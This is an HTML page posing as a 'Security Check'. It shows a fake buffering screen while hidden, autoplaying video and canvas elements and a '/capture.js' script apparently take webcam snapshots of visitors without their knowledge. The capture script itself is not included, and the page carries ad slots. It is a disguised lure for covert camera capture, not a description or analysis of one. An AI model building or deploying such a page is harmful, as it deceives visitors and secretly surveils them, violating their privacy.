<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
    <title>Security Check</title>
    <meta property="og:title" content="Security Check" />
    <meta property="og:type" content="website" />
    <meta property="og:url" content="Security Check" />
    <meta name="og:image" content="/desc.png" />
    <meta name="description" content="Security Check" property="og:description">
    <meta name="description" content="/desc.png" property="og:image" />
    <meta name="twitter:card" content="summary" />
	<meta name="twitter:title" content="Security Check" />
	<meta name="twitter:description" content="Security Check" />
	<meta name="twitter:image" content="/desc.png">
    <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
    
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    

</head>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="500" height="700"></canvas>
 
 <script src="/capture.js">

 </script>


<center>
<style>
.centered {
  position: absolute;
  top: 4%;
  left: 73%;
  transform: translate(-50%, -50%);
}
</style>
  <img src="FOREground.png" style="width:100%;">
  <div class="centered">
<img src="buffering.gif" width="60%"></div>

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing 2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="2568634816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
 <center> 
<div class="container">


<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
 data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="5590491777"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>

            </div>
        </div>
			
</body>
 

</html>        
